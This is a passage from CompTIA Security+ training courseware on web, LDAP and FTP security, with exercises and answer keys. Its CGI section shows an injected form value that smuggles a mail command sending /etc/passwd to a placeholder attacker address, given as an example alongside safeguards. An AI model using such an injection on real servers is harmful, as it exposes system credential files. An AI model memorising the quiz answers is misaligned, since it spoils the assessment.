vulnerabilities exposed by ActiveX. Unless specifically needed however, the best way to protect against such attacks is to disable ActiveX scripting altogether from the client.

618
Do it!

CompTIA Security+ Certification

B-1:

Discussing JavaScript and ActiveX vulnerabilities

Questions and answers


1 Which of the following HTML tags indicates the beginning of JavaScript code? A B C
D

<body> <title> <A> <script>

2 Which of the following is true of JavaScript programs? (Choose all that apply.)
A B C D

They can be downloaded with an HTML page. They can perform tasks undetected by the user. They can pass through firewalls. They can monitor the browsing activities of a user.

3 ActiveX allows users to view MS Office documents directly from a browser interface. True or false?
True

4 An attacker could use ActiveX to embed harmful macros into MS Office documents. True or false?
True

5 The best way to protect against virus infections by ActiveX is to: A B C


D

Switch on the auto preview feature in the e-mail program. Modify the ActiveX script. Use an antivirus scanner. Disable ActiveX scripting.

Web security

619

Buffer overflows
Explanation The buffer overflow attack can be triggered by sending large amounts of data that exceed the capacity of the receiving application within a given field. When executed with precision and deliberation, such attempts might cause the application to stop performing its intended functions and force it to execute commands on behalf of the attacker. If the application under attack has sufficient (root) administrative privileges, it is possible for the attacker to take control of the entire system through the controlled application. There are two prerequisite objectives the attacker needs to accomplish to execute a successful buffer overflow attack: Place the necessary code into the programs address space The attacker uses the victims buffer to place the necessary code that executes the intended attack. This is accomplished by sending instructions (bytes) to the CPU of the target system. Direct the application to read and execute the embedded code through effective manipulation of the registers and memory of the system Most of the time, the code the attacker is looking to exploit already exists on the target system. In these types of situations, all the attacker needs to do is to modify the necessary parameters to point to the targeted section of the code. These actions are intended to corrupt the receiving buffer and alter the programs control flow to trigger the desired action. In such attacks, the attacker can gain access to a prompt, examine system-specific variables, read system directories and files, and even detect network architecture, which he or she can use to further exploit the system. This can be especially dangerous when the application is configured to have root privileges on the system. In this case, the attacker can operate as the system administrator of the Web server and its environment. Effective buffer overflow attacks are not easy to coordinate. The attacker needs to be precise enough to launch the attack using the instruction pointers so that he or she can take over the administrative privileges without crashing the system. Vulnerabilities Buffer overflow attacks often take advantage of poor application programming that does not check the size of the input field. Abundant information about the vulnerabilities is published on the Internet for the edification of vendors and hackers alike. Safeguards Careful design of the application, based on the intended response, can effectively prevent such attacks. While implementing buffers, software developers could set the program to throw away the excess data, halt all operations, or provide the user with a warning message if a buffer overflow condition presents itself. A more proactive approach would be to design the application to automatically check the size of the data that enters the buffer. System administrators should maintain current updates and patches on all software. The CERT Coordination Center (www.cert.org/current/) provides advisories on all recently discovered application vulnerabilities. They also maintain an archive of previously found vulnerabilities at www.cert.org/advisories.

620

CompTIA Security+ Certification

Cookies
Cookies serve a variety of functions, from personalizing Web pages based on user preferences to keeping the state of a users shopping cart on an online store. Most Webbased authentication models are engineered to utilize cookies for verification of a users session. Cookies have been designed to enhance the browsing experience of a typical user. Cookies are stored on a users hard drive and can be accessed by a users Web browser. The files contain saved login information, your address, shopping cart status, and a host of other things that can make the Web browsing experience more convenient. In Windows 2000/Server 2003 and XP, these cookie files are stored in the Documents and Settings folder for each user of the computer (the user profile). Vulnerabilities Cookies contain tools that are easily exploited by hackers and some so-called legitimate services to provide information about users without consent. Hackers often target cookies as a means of gaining illegal access to user accounts. Cookies can also be utilized to track information, such as the browsing habits of users, which might then be sold to an advertisement company that targets the user with unwanted ads. Its extremely crucial for Web site owners to design security measures to handle Web-based cookies in order to protect their user base and the sensitive data stored on their servers. Pages that can use a servers cookies are limited to that particular server, or to a domain hosting the server. An attacker could obtain a victims cookie for a given service by generating a script that must execute within a page from that same domain or server. One can accomplish this by a process known as Error Handling Exception (EHE). An attacker can execute a code on the server that generates an error message that is returned to the user. The attacker can then exploit the insecure error notification to launch an attack on the target server. This is possible by manipulating the error messages that are returned from 404 requests (404 File Error) or from elements that are echoed back to the screen unescaped.
If students are unfamiliar with HTML coding, explain that the <A> tag is the anchor element used in hyperlinks.

Its not possible for an attacker to obtain a given cookie directly from a victims computer. The attacker must convince a user to follow a malicious hyperlink to the targeted server so the cookie can be obtained through the error handling process on the server. For example, the attacker could send an e-mail (containing a link to the server) to an HTML-enabled e-mail client. More specifically, a hacker can manufacture a hyperlink and hide the malicious script behind the desired text of the <A> tag. When the innocent user activates the link, the malicious script embedded in the link can trigger the server to send the cookie to the attacker. One of the limiting factors of this type of attack is that the user must be logged on to the service during the time the attack takes place. If, for instance, the innocent user is not logged on to his Hotmail account (HTML-enabled service), the attacker cannot use this technique to launch the attack.

Web security Safeguards

621

The following policies will help protect your organization against cookie exploits: Disable the use of cookies by reviewing your browsers preferences and options. You can also specify that you be prompted before a site puts a cookie on your hard disk, so you can choose to allow or disallow the cookie. Notice that disabling cookies will make some Web pages inoperable. Do not use cookies to store sensitive information. If you must store confidential information in cookies, use SSL/TLS to prevent the information from being exploited by a hacker. Do it!

B-2:

Discussing buffer overflow and cookie vulnerabilities

Questions and answers


1 Buffer overflow attacks perform which of the following task(s)? (Choose all that apply.) A
B C

Monitor a browsers activities. Send enough data to overfill the buffer of a given field within an application. Force an application to execute commands on behalf of the attacker. Embed malicious macros.

2 What are the prerequisites for executing a buffer overflow? (Choose all that apply.)
A

The attacker must modify the necessary parameters to point to the embedded code. The attacker must log in as the system administrator of the Web server. The attacker must launch the attack while the user is logged onto the service. The attack must place the necessary code to execute the attack in the victims buffer.

B
C D

3 A hacker can exploit cookies to gain illegal access to user accounts and track the browsing habits of users. True or false?
True

4 Hackers can only gain access to a cookie if the user logs on to the targeted service at the same time the attack takes place. True or false?
True

622

CompTIA Security+ Certification

Java applets
Explanation Java applets are Internet applications (written in Java programming language) that can operate on most client hardware and software platforms. Applets are typically stored on Web servers, from which they can be downloaded onto clients when accessed for the first time. When subsequently accessing the server, the applet is already cached on the client and, therefore, can be executed with no download delay. Signed and unsigned applets Distribution of software over networks poses potential security problems because the software must pass through many intermediate devices before it reaches the users computer. Software, unless downloaded from a trusted party, poses significant risks for an individual users computer and data. The user often has no reliable way of confirming the source of downloaded software code or whether it was changed in transit over the network. Signing applets is a technique of adding a digital signature to an applet to prove that it came unaltered from a particular trusted source. The application generates a private/public key pair and obtains a certificate authenticating the signer. The application then signs the applet code. Users downloading the applet can check the signature to verify the source of the code. Signed applets can be given more privileges than ordinary applets. An unsigned applet operates subject to a set of restrictions called the sandbox model. Sandbox restrictions prevent the applet from performing certain operations on local system resources (for example, deleting files or modifying system information such as registry settings and other control panel functions). Signed applets do not have such restrictions. Unsigned applets typically display warning messages, such as the ones shown in Exhibit 6-2.

Exhibit 6-2: Unsigned applet warning message The user of the system on which the applet will be running decides what kind of access privileges should be granted to the signer of the applet. Commonly used browsers, such as Netscape and Microsoft Internet Explorer keep track of these privileges. Depending on the applets privileges, such browsers can grant access to system resources without interrupting the user. If the applet is new and has not established a trust relationship with the clients system, the browser displays a security message confirming the consent of the client, as shown in Exhibit 6-3.

Web security

623

Exhibit 6-3: Security message confirming consent Digitally signing an applet is a confirmation from the owner of the applet about its legitimate purpose. The final decision about whether the applet should have access to system resources always rest with the client. If a signed applet damages a certain system intentionally or unintentionally, the applet can be traced back to its source from its signature. Two reasons for using code signing features are: To release the application from the sandbox restrictions imposed on unsigned code To provide confirmation regarding the source of the applications code The Java Development Kit ( 1.1 and later) Security Manager is aware of signatures, and, working in conjunction with the Java key tool (which is used to sign code and specify who is trusted), grants special privileges to signed and trusted applet code.

624

CompTIA Security+ Certification

CGI
The Common Gateway Interface (CGI) is a programming interface that allows Web servers to perform data manipulation and interact with users. For example, CGI scripts perform data input, and search and retrieval functions on databases. CGI was created to extend the HTTP protocol. There are typically two parts to a CGI script: an executable program on the server (the script itself), and an HTML page that feeds input to the executable. The executable can be in the form of Perl scripts, shell scripts, or compiled programs. CGI scripts can sometimes be used without user input to perform tasks such as incrementing page counters and displaying the date and time. The following steps and Exhibit 6-4 represent a typical form submission that takes place on the Internet: 1 The user/client retrieves a form (an HTML-formatted page) from a server via a browser. 2 The user fills out the form by inputting data into the required fields on his or her local machine. 3 After filling out the form, the user submits the data to the server. This typically takes place via the use of a submit button on the form. 4 The submit action performed on the clients browser identifies the corresponding program residing on the server, sends all inputted data, and ignites an execute request to the server. 5 The server executes the requested program.

Exhibit 6-4: Working of a CGI script A similar process takes place for all types of CGI execution. CGI is very efficient because all data manipulation takes place on the server, not the client. The client merely passes data to the server and receives HTML in return. This leaves the server with only the task of executing the request when issued. Vulnerabilities The interactive nature of CGI also leads to security loopholes that need to be addressed by system administrators and software developers. CGI accepts input from a page on a client system (typically an HTML page downloaded in the browser), but executes the request on the server. Allowing input from other systems to a program that runs on a local server exposes the system to potential security hazards. Because the HTML form has been transferred to the client, a malicious user can modify or add parameters to the HTML form, instructing the server to do tasks outside the intended purpose of the form.

Web security For instance, a malicious user can modify the following instruction:

625

<INPUT TYPE="radio" NAME="send_to" VALUE="systemadmin@example. com">System Admin<br>

This instruction is supposed to generate an e-mail to a system administrator with the following line:
<INPUT TYPE="radio" NAME="send_to" VALUE="systemadmin@example. com;mail malicioususer@attack.com /etc/passwd"> SystemAdmin<br >

This line then sends an e-mail containing the UNIX password file to the attacker. Using such techniques, an attacker can gain access to confidential files and systems files or install malicious programs and viruses. Safeguards It is extremely important to take precautions when running scripts on the Web server. Here are some possible precautions to take: Deploy intrusion detection systems (IDS), access list filtering and screening. Design and code applications to check the size and content of the input received from the clients. Create different user groups with different permissions and restrict access to the hierarchical file system based on those groups. Validate the security of a prewritten script before deploying it in your production environment. The biggest security risk of CGI scripts is not to the client where the Web browser resides, but to the server where the script resides. CGI scripts must be carefully scrutinized before allowing them to be placed on a Web server.

626
Do it!

CompTIA Security+ Certification

B-3:

Reviewing signed applet and CGI vulnerabilities

Questions and answers


1 A(n) unsigned applet operates subject to a set of restrictions called the _________________________.
Sandbox model

2 New applets require the consent of the client to install. True or false?
True

3 __________________ is a programming interface that allows Web servers to perform data manipulation and interact with users.
CGI

4 Which of the following can perform the CGI scripts tasks? (Choose all that apply.)
A

Search for information Embed malicious macros in a document Collect client data using forms Mail password files to an attacker

B
C D

5 List two precautions that you should take when running CGI scripts.
Answers might include:

Deploy intrusion detection systems (IDS), access list filtering and screening on the
border of the network. clients.

Design and code applications to check the size and content of the input received from the Create different user groups with different permissions and restrict access to the
hierarchical file system based on those groups. environment.

Validate the security of a prewritten script before deploying it in your production

Web security

627

SMTP relay
Explanation Simple Mail Transfer Protocol (SMTP) is the standard Internet protocol for global email communications. A mail client (user) communicates with the mail server using the SMTP protocols TCP port 25 to get e-mail from one place to another. Current versions of SMTP support ASCII and MIME content. With its high utilization across the Internet, SMTP is intentionally designed as a very simple protocol. This also makes it easy to understand and troubleshoot; unfortunately, malicious users can easily exploit this simple design in many ways across the Internet. SMTP spams Third-party SMTP relay is used to transfer messages from one server to another via SMTP. A malicious user could exploit this basic concept and try to hide the real origin of a message by using another server as an SMTP relay. In such a scenario, the attacker can use the relay Internet Mail Service as an agent for unsolicited commercial e-mail (spam), flooding innocent users mailboxes with many copies of the same message. Spam is an attempt to force messages on people who would not otherwise choose to receive them. Before you can understand how spamming is achieved via SMTP relay, its important to understand how SMTP functions. The following code demonstrates the sending of an email message with a programming interface as opposed to using a user-friendly e-mail client such as Eudora. You can actually accomplish this by connecting to TCP port 25 of the SMTP server and executing these commands.
HELO mail.example.com 250 mail.anotherexample.com Hello mail.example.com [172.16.35.44], pleased to meet you MAIL FROM: person1@example.com 250 person1@example.com Sender ok RCPT TO: person2@anotherexample.com 250 person2@anotherexample.com Recipient OK DATA 354 Enter mail, end with "." on a line by itself From: To: 250 OAA08757 Message accepted for delivery

This transaction takes place between two SMTP servers. The sending server executes the bold lines; the nonbold lines are responses from the receiving server. The sending server introduces itself as example.com. The receiving server serves the anotherexample.com domain. MAIL FROM: and RCPT TO: fields indicate the source and the destination of the message. These fields (up until the DATA field) make up the envelope of the message. The DATA field comprises of the body of the message as well as the header fields. The key point is that the only variable needed to deliver the message is the RCPT TO:; a malicious user can forge other variables.

628

CompTIA Security+ Certification Its important to identify the real origin of a spam mail in order to take the necessary action. An e-mail message typically traverses through at least two SMTP servers (the senders and the receivers SMTP servers) before reaching the destination client. As messages voyage to their destination, they get stamped by the intermediate SMTP servers along the way. The stamps generate useful tracking information that can be observed in the mail headers. Careful examination of these mail headers can go a long way in identifying the real source of spam mail. The following text is a typical Received: header from an e-mail message:
From forged-address@example.com Received: from example.com ([172.16.35.44]) by mail.anotherexa mple.com (8.8.5) for <receiver@anotherexample.com>

Although such messages do not issue any alarms per se, careful examination of these messages could unveil mismatches between the IP addresses and the domain names indicated in the header. You could verify this by executing a reverse DNS lookup to find out the domain name that corresponds to the indicated IP address. For instance, in the Received: header above, reverse DNS lookup could reveal that the IP address (172.16.35.44) does not really correspond to the example.com domain. In fact, most modern mail programs have already incorporated this functionality, which generates a Received: header that includes the identity of the attacker. Spam via SMTP relay can lead to loss of bandwidth and hijacked mail servers that might no longer be able to serve their legitimate purpose. Furthermore, mail servers of innocent organizations can be subject to blacklisting due to problems caused by SMTP relay. This might in turn prevent an organization from communicating with other organizations. There are institutions, such as the Open Relay Behavior-Modification System (ORBS) and Mail Abuse Prevention System (MAPS), which provide reporting, cataloging, and testing of e-mail servers configured for SMTP relay. These institutions maintain Realtime Blackhole Lists (RBL) of mail servers with problematic histories. Being blacklisted by these types of organizations can adversely affect a businesss operations. Safeguards Companies might configure their systems so that any mail coming from the blacklisted mail servers are automatically rejected.

Web security Do it!

629

B-4:

Understanding SMTP relay vulnerabilities

Questions and answers


1 SMTP is an Internet e-mail service and uses TCP port 25. True or false?
True

2 It is possible to forge the MAIL FROM: variable within an SMTP message. True or False?
True

3 Describe some of the problems with spam via SMTP relay.


Spam via SMTP relay can lead to a loss of bandwidth and hijacked mail servers that might no longer be able to serve their legitimate purpose. Furthermore, mail servers of innocent organizations can be subject to blacklisting due to problems caused by SMTP relay. This might in turn prevent an organization from communicating with other organizations. If you are blacklisted, your business operations can be adversely affected. Your e-mail might be automatically rejected by other organizations that configure their systems based on the blacklisted mail servers.

630

CompTIA Security+ Certification

Topic C: Configuring Internet Explorer security


Explanation Most large companies have advanced firewalls and proxy services that allow them to filter or block certain content addressed to employee desktops. This is a necessary feature, but its not always practical, especially for small- to mid-sized companies, but fortunately Microsoft has built-in security features available for users of Internet Explorer.

Exhibit 6-5: Internet Options dialog box with the Security tab activated. Do it!

C-1:

Configuring and discussing security Heres why


Youll configure Trusted Sites in Microsoft Internet Explorer 6.

Heres how
1 Switch to Internet Explorer 2 Choose Tools, Internet
Options

3 Activate the Security tab 4 Select Trusted Sites

As shown in Exhibit 6-5.

Web security 5 Click Default Level

631

To set the security level for the zone to Medium. If it is already set to Medium, the Default Level button will be dimmed.

6 Click Sites 7 Add the following Web site to the zone:


www.course.com

8 Click Close 9 Select Restricted Sites 10 Click Sites Add the following Web sites to the zone:
www.kazaa.com ftp.microsoft.com To configure Restricted Sites to block file downloads in Microsoft Internet Explorer 6.

11 Click Close 12 Click OK 13 In the Internet Explorer Address box, enter www.kazaa.com 14 Enter ftp.microsoft.com Navigate to /Reskit/win2000 15 Right-click ADSizer.exe Select Copy to Folder
A security alert appears. URLs can be redirected, so this is not the best way to block file downloads. To close the Internet Options Window. Notice the Restricted sites icon in the lower right corner of the browser. Kazaa completely fails to load. In the browser's Address field.

Click OK 16 Close the browser

To close the alert.

632
Do it!

CompTIA Security+ Certification

C-2:

Reviewing trusted sites

Questions and answers


1 Which of the following is a zone that contains all Web sites that have not been placed in other zones?
A

Internet Local intranet Trusted sites Restricted sites

B C D

2 Which of the following is a zone that contains Web sites that could potentially cause damage to your system? (Choose all that apply.) A B
C D

Internet Local intranet Trusted sites Restricted sites

3 Which of the following is a zone that contains Web sites that you believe will not cause damage to your system? A B
C

Internet Local intranet Trusted sites Restricted sites

Web security

633

Privacy settings
Explanation One issue many users have with Web browsing is the fact that anyone on the Internet has the ability to write information to their computers hard drive. One example of this ability is the use of cookies. Cookies can be valuable to both the user and the company that deposits them. For example, if you go to an e-commerce site and fill out a form with all your important data, a cookie can be used to remember you. This is helpful because youll not have to enter the data every time you visit the site. While this capability can be very helpful, it can also be a major security risk. With that cookie on your computer, anyone with access to your computer could go to the e-commerce site and purchase goods without your knowledge.

Exhibit 6-6: The Internet Explorer Privacy settings tab

634

CompTIA Security+ Certification

Exhibit 6-7: Overriding Privacy settings with Per Site Privacy Actions to allow cookies to a selected site Do it!

C-3:

Configuring and discussing privacy settings Heres why


Youll configure Microsoft Internet Explorer 6 Privacy settings. The Internet Options window appears.

Heres how
1 Launch Internet Explorer 2 Choose Tools, Internet
Options

3 Activate the Privacy tab Slide the Settings bar up to High 4 Click Edit 5 In the Address of Web Site box, type www.yahoo.com 6 Click Allow Click OK 7 Click OK
Notice that only the domain is added to the Managed Web sites list. To block cookies that do not comply with the W3C P3P. To add Web sites you want to allow to bypass the settings.

Web security 8 In the Address box of your browser, enter www.msn.com 9 In the Privacy message, click OK Double-click the cookie privacy warning in the toolbar

635

A report displays, similar to the one shown below:

10 Click Close 11 In the Internet Explorer Address box, enter www.yahoo.com 12 Choose Tools, Internet
Options Notice the privacy warning is absent.

13 Activate the Privacy tab 14 Click Default Click Apply

Youll reset the privacy settings.

To return to the medium setting.

636
Do it!

CompTIA Security+ Certification

C-4:

Reviewing cookies

Questions and answers


1 A cookie is a small text file that stores information that can be used by a server. True or false?
True

2 Which of the following Privacy settings will block all cookies without a Compact Privacy Policy? A
B

Block all cookies High Medium high Accept all cookies

C D

3 Which of the following Privacy settings is likely to cause some Web pages to fail to load? (Choose all that apply.)
A B C D

Block all cookies High Medium high Medium Low Accept all cookies

E F

Web security

637

Advanced security settings


Explanation In addition to cookies, Internet Explorer can store information about your Web browsing habits by caching. This can be a problem in areas that requires a high level security. Most users are aware of Temporary Internet Files and how to remove them. Temporary Internet Files are used as a local cache to increase the speed of Web browsing, but the files can also be used to track your path on the Web. Usernames and passwords can also be stored to save you time, but this might allow for unauthorized access to resources. These issues can be resolved by using Internet Explorers Advanced Security Settings.

Exhibit 6-8: Advanced Internet security options

638
Do it!

CompTIA Security+ Certification

C-5:

Configuring and discussing advanced security settings Heres why

Heres how
1 Activate the Advanced tab Scroll down to the Security section and review the settings 2 Activate the Content tab 3 Click AutoComplete Clear Usernames and
passwords on forms

(As shown in Exhibit 6-8.)

4 Click OK 5 Click OK 6 Close all open windows

To close the AutoComplete Settings window. To close the Internet Options window.

Web security Do it!

639

C-6:

Reviewing advanced security settings

Questions and answers


1 If you wish to prevent secure files from being stored in Temporary Internet Files you can check which of the following Security options? A
B

Do not save encrypted file to disk Empty Temporary Internet Files folder when browser is closed Use Fortezza Do not save Certificates to disk

C D

2 When you enable the option Empty Temporary Internet Files folder when your browser is closed, it also deletes all cookies. True or false?
False: It does not affect the cookies.

640

CompTIA Security+ Certification

Unit summary: Web security


Topic A In this topic, you learned the fundamentals of SSL/TLS and HTTPS protocols and their implementation on the Internet. You learned that the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) are commonly used protocols for managing the security of a message transmitted across the insecure Internet. In this topic, you learned the basics of how JavaScript, buffer overflow, ActiveX, cookies, CGI, applets, and SMTP relay work, and how they are commonly exploited by hackers. In this topic, you learned how to configure Microsoft Internet Explorer to block cookies and file downloads and set privacy setting. You also learned how to configure advanced security settings.

Topic B

Topic C

Review questions
1 Signing applets is a technique of adding a _________ __________ to an applet to prove that it came unaltered from a particular trusted source.
digital signature

Sandbox restrictions might prevent the applet from performing required operations on local system resources. True or false?
True

In order to use SSL security in a Web page transaction, what must be used in the Web page URL?
HTTPS

A time stamp is a typical component found on a typical certificate. True or false?


True

__________________ is an interface specification that allows communications between client programs and Web servers.
CGI

71

Unit 7 Directory and file transfer services


Unit time: 90 minutes Complete this unit, and youll know how to:
A Describe LDAP directory services. B Identify the major vulnerabilities of the

FTP method of exchanging data and identify countermeasures.


C Describe the threat posed to your network

by unmonitored file sharing.

72

CompTIA Security+ Certification

Topic A: Introduction to directory services


This topic covers the following CompTIA Security+ exam objective:
# 2.4 Objective Recognize and understand the administration of the following directory security concepts LDAP (Lightweight Directory Access Protocol)

Directory services
Explanation A directory service provides a database for inventory and administration of every object on the network. The directory service performs the following functions: Records and organizes information about every user account, server, printer, workstation, and file system on the network. Grants users access to applications, files, printers, and other network services anywhere on the network with a single login sequence. Enables the LAN Administrator to track the location and disposition of all network resources. Information gathered for each network resource is stored as an object in the database. Users can query the database using a broad set of criteria (such as name, type of service, or location).

LDAP
Lightweight Directory Access Protocol (LDAP) is a commonly used directory service protocol created by the Internet Engineering Task Force (IETF). It was originally designed to work as a front-end client for X.500 directory services (an ISO and ITU standard that defines how global directories should be structured). X.500 requires the full OSI protocol stack and significant computer resources to operate. In response, LDAP was redesigned as a stripped-down version of X.500. LDAP offers the following features: Hierarchical database structure follows X.500 standards Extensible for use with any X.500-compatible database Provides authentication and authorization services Easily deploys on any client or server Runs over TCP/IP networks Supports most operating systems (platform-independent) LDAPs key advantage is that its a versatile directory system that is standards-based and platform-independent. This has caused LDAP to proliferate to nearly all operating systems and has caused the protocol to be widely adopted for a variety of networking applications (see the following table for a sample of major players in the LDAP market). This protocol runs on TCP/IP, so it can be deployed on most networks.

Directory and file transfer services


Vendor Microsoft Sun IBM Novell MessagingDirect Opensource Product Active Directory ONE Integration Server (formerly Netscape iPlanet) Directory Server eDirectory M-Vault OpenLDAP

73

Authentication and authorization


As more and more applications have been deployed on the network to support critical business functions, there has been an increasing need to authenticate users to secure those applications. Todays networks typically have a host of operating systems and a matching number of different applications. LDAP synchronizes usernames and passwords across operating platforms and applications, enabling access to network resources with a single login sequence. A few common applications of LDAP include: Single sign-on (SSO) SSO is an authentication process in a client/server environment where a user can enter a single username and password and obtain access to more than one application or network resource. User administration A major problem for enterprises is the costly task (in terms of system administrator time) of maintaining user accounts. Maintenance activities include the creation and deletion of accounts, as well as adding and removing user privileges (such as when a user moves to another department). LDAPs flexibility simplifies this process because administrators have only one user database to manage, and it handles authentication and authorization for all major applications. Public key infrastructure (PKI) PKI is a system for creating and managing certificates used for authentication and encryption. A basic requirement for PKI is the maintenance of user certificates, which is often accomplished using LDAP. A user certificate contains a users public key together with additional identifying data. This certificate is created and authenticated by a certificate authority (CA) that guarantees the certificate is valid (the users identity has been validated), provided it has not been revoked. Most CAs support the delivery of certificates to LDAP-based directory systems.

74

CompTIA Security+ Certification

LDAP framework
An LDAP directory follows the X.500 hierarchical tree format as shown in Exhibit 7-1. The diagram portrays an inverted tree, with its root at the top and branches extending out from the root. The branches are classified as containers since their sole purpose is to hold or contain other objects. The most elemental units are called leaf objects. Each leaf on the tree describes a single network resource, such as a computer, printer, user, or file system directory.

Exhibit 7-1: Directory information tree

Directory and file transfer services The following table describes each level of the tree structure:
Level [Root] Description

75

At the top of this inverted tree is the [Root]. Like the root of the file directory tree, this is the highest level you can go within the LDAP structure. The [Root] is created during installation of the first LDAP server on the network and cannot be moved, deleted, or renamed. The Directory tree can have only one [Root]. The Country object, an optional object representing the country of the network, is positioned directly beneath the [Root] object. The next level contains an object called the Organization. The Organization is classified as a container, since its sole purpose is to hold or contain other objects. Organizations typically represent a company or department and are used to store other objects. Every tree must have at least one Organization. Beneath the Organization is another container called the Organizational Unit. Organizational Units typically represent a division, department, workgroup, or project team, and can contain other Organizational Units or leaf objects. Organizational Units are optional in the LDAP hierarchy. Leaf objects are the most elemental unit in the LDAP tree. Each leaf on the tree describes a single network resource. The Directory tree represents each leaf object with an icon that shows what type of resource it is and how it is named.

Country Organization

Organizational Unit

Leaf Objects

Each entry in the directory has a distinguished name (DN) and its own attributes followed by specific values. Each distinguished name must be unique throughout the LDAP directory because it identifies a single network object. An example of the DN of an entry (an individual) stored in a LDAP directory is:
cn=Jonathan Q Public, ou=Information Security Department, o=XYZ Corp, c=United States

Using the following table you can decode the fields in the DN. Jonathan Q Public is the common name of the individual who works in the Information Security Department of XYZ Corp., which is headquartered in the United States.
Abbreviation DN CN OU O C Description Distinguished name Common name Organizational unit Organization Country

76

CompTIA Security+ Certification

LDAP security benefits


Some key benefits of LDAP is that it provides authentication of users to ensure their identities, authorization services to determine which network resources the user might access, and finally, encryption for secure communications. LDAP offers encryption by utilizing other protocols through a standards-based interface called Simple Authentication and Security Layer (SASL). Authentication To access the LDAP directory service, the LDAP client must authenticate itself to the LDAP. LDAP then uses the bind operation to provide authentication services when the client attempts to establish a connection with a server. Three levels of authentication are provided by LDAP: No authentication This mode is used if the directory is publicly published information and there is no need to restrict access. An example of such a directory might be the business white pages that list the telephone numbers of all businesses in the Phoenix metropolitan area. Simple authentication Simple mode passes the authentication information across the network in clear text. This clear security risk can be mitigated if encryption is provided by a lower-level protocol such as IPSec. SASL This standards-based scheme launches one of several security methods to add encryption to connection-oriented protocols. SASL leverages a variety of methods including TLS and IPSec. When LDAP authentication is used in SASL mode, any method of encryption included in the SASL framework might be used to secure the user authentication operation. TLS/SSL is the most commonly used method with LDAP 3. Authorization After a client has been authenticated and his or her identity has been established, the LDAP server can determine what resources, applications, and services the user is permitted to access. This is called authorization, or access control, and is determined by access control lists (ACLs). For example, ACLs can be entries that state whether a given user has permission to read, write, add, or delete when accessing specific resources. There are no standards for implementing ACLs; each vendor of LDAP products implements ACLs in its own way. Encryption As was noted in the discussion of SASL, most LDAP servers allow their services to be accessed via TLS and SSL. Generally, secure LDAP (LDAPS) servers use port 636 as a standard SSL/TLS socket number. Directory servers can also support custom sockets, but to do so, the client has to identify the appropriate socket to access the directory services on the server through SSL.

Directory and file transfer services

77

LDAP security vulnerabilities


Like any directory service, LDAP is a prime target for attacks and tampering. As a consolidated and unified source of user authentication information (as is the case when an entire enterprise becomes directory enabled), the LDAP server represents a much more valuable and hence risk-prone asset compared to other directory servers. This is because user information previously might have been stored in a variety of locations on the network, and each location allowed access to only a subset of network resources. When that information is all brought together in one place, its easier to securebut the penalties for failing to secure it properly are much higher because a successful attacker can do much more damage. The following are some major types of attacks LDAP servers must be secured against: Denial of service Attacks against an enterprises directory server can have massive ramifications. Mission-critical applications that rely upon the LDAP server for authentication might become unavailable until service is restored. Man-in-the-middle By tricking a client into authenticating to a bogus server, an attacker can gather valuable account information or feed the client false data. Attacks against data confidentiality The directory information contained in the LDAP server is extremely important, so efforts to ensure the directory is confidential are critical. Even if LDAP network traffic is encrypted, there are a multitude of attacks and exploits that an attacker can use to gain access to an LDAP server and the data it contains.

Countermeasures
Extra steps must be taken to secure the LDAP server, including: Apply the latest operating system and application security patches. Remove unneeded services and applications that could potentially present an exploitable vulnerability. Configure strong authentication using Kerberos for LDAP v2 or SASL for LDAP v3. Block LDAP (typically, TCP/UDP ports 389 and 636) at the firewall.

78
Do it!

CompTIA Security+ Certification

A-1:

Understanding directory services

Questions and answers


1 Information gathered for each network resource is stored as a(n) _________ in the database. A
B

leaf object container query

C D

2 Name three functions that a directory service performs.


Records and organizes information about every user account, server, printer,
workstation, and file system on the network.

Grants users access to applications, files, printers, and other network services anywhere
on the network with a single login sequence. resources.

Enables the LAN Administrator to track the location and disposition of all network

3 LDAP stands for _________________________________.


Lightweight Directory Access Protocol

4 Name two similarities between X.500 and LDAP.


Both use the same hierarchical database structure and standards. Both provide authentication and authorization services. Both are platform-independent.

5 Name two differences between X.500 and LDAP.


LDAP runs on TCP/IP; X.500 requires the full OSI protocol stack. LDAP requires much less computer resources. LDAP is easier to install than X.500.

6 Provide the distinguished name for the following leaf object: Company: Emerald Consulting Department: Information Services Volume: UNIX401_SYSTEM
cn= UNIX401_SYSTEM, ou=Information Services, o=Emerald Consulting

7 SSO is an authentication process in a client/server environment where a user can enter a single username and password and obtain access to more than one application or network resource. True or false?
True

Directory and file transfer services 8 What are some major types of attacks LDAP servers must be secured against? (Choose all that apply.)
A B C

79

Man-in-the-middle Denial of service Attacks against data confidentiality Encryption

710

CompTIA Security+ Certification

Topic B: File transfer services


This topic covers the following CompTIA Security+ exam objective:
# 2.5 Objective Recognize and understand the administration of the following file transfer protocols and concepts S/FTP (File Transfer Protocol) Blind FTP (File Transfer protocol) / Anonymous Vulnerabilities Packet Sniffing

FTP
Explanation It is obvious to most people who have downloaded files over the Internet that the ability to share programs and data with other people around the world is an essential aspect of the Internet that continues to drive its explosive growth. This is why file transfer is so critical to todays networked organizations. An often-overlooked aspect of this is the security and integrity of the typically secret data that businesses need to exchange over the Internet. As incredible and wonderful as the Internet might be, its a wild and uncontrolled network and poses a number of risks to your businesss data. One of the most commonly used application protocols on the Internet is File Transfer Protocol (FTP). Its also one of the most insecure services in use. The reason it is so commonly used is that most FTP clients and servers are free, distributed with most operating systems, and relatively easy to use. System administrators can easily exchange files with remote offices and business partners over the Internet by setting up an FTP server in a matter of minutes and with no additional cost. The list of vulnerabilities and attacks associated with FTP is a long one. FTP was one of the early TCP/IP applications and was designed without the security features of many current applications. To understand FTPs inherent flaws, one must first understand the mechanism by which FTP authenticates and transfers data between a client and a server. FTP has two standard data transmission methods: active FTP and passive FTP. The terms active and passive refer to the servers roll in setting up the TCP session, as shown in Exhibit 7-2.

Exhibit 7-2: Setup of the FTP command connection

Directory and file transfer services

711

